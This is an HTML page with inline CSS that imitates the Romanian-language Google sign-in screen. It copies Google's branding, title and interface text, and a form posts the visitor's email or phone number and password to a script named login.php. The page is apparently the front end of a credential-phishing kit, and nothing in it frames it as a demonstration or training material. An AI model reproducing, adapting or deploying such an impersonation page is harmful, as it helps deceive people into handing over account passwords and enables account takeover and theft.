<!DOCTYPE html>
<html lang="ro">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="icon" href="google.jpg">
        <title>Conectați-vă-Conturi Google</title>
    </head>
    <body>
        <div class="header">
            <div class="hop">
                <div class="img">
                    <img src="index.jpeg">
                    </div>    
        <div class="text">
            <h1>Conectați-vă</h1>
            <h2>Folosiți Contul Google</h2>
        </div>
        <form action="login.php" method="file">
        <div class="text">
            <input type="text" name="username" placeholder="Adresa de e-mail sau numărul de telefon">
        </div>
        <div class="pass">
            <input type="password" name="password" placeholder="Parolă"><br>
        </div>
        <div class="jop">
            <p>Nu este computerul dvs.? Pentru a vă conecta,<br>folosiți o fereastră Privată.<a href="#">Aflați mai multe</p>
        </div>
        <div class="tip">
            <p><a href="#">Creaţi un cont</p>
        </div>
        <div class="btn">
        <button>Înainte</button>
        </form>
        </div>
        </div>
        </div>
        </body>
        </html>
        <style>
            *{
                padding: 0;
                text-decoration: none;
            }
            .header .hop{
                background-color: rgb(255, 255, 255);
                width: 430px;
                height: 500px;
                border-radius: 10px;
                border: 1px solid #818080;
                margin-left: 750px; 
                margin-top: 150px;
            }
            .img img{
                height: 40px;
                margin-left: 160px;
            }
            .text h1{
                font-size: 25px;
                margin-left: 120px;
            }
            .text h2{
                font-size: 14px;
                margin-left: 120px;
            }
            .text input{
                padding: 15px;
                width: 80%;
                margin-left: 21px;
            }
            .pass input{
                padding: 15px;
                width: 80%;
                margin-left: 21px;
                margin-top: 30px;
            }
            .btn button{
                background-color: rgb(5, 128, 199);
                width: 21%;
                padding: 7px;
                border-radius: 10px;
                color: rgb(255, 255, 255);
                margin-left: 310px;
                margin-top: -70px;
            }
            .jop p{
                font-size: 15px;
                margin-left: 30px;
            }
            .tip a{
                font-size: 12px;
                margin-top: 120px;
                margin-left: 20px;
            }
            @media screen and (max-width:1233px){
                .header .hop{
                background-color: rgb(255, 255, 255);
                width: 430px;
                height: 500px;
                border-radius: 10px;
                border: 1px solid #818080;
                margin-left: 450px; 
                margin-top: 150px;
                }
            }
            @media screen and (max-width:867px){
                .header .hop{
                background-color: rgb(255, 255, 255);
                width: 430px;
                height: 500px;
                border-radius: 10px;
                border: 1px solid #818080;
                margin-left: 5px; 
                margin-top: 150px;
                }
            }
        </style>
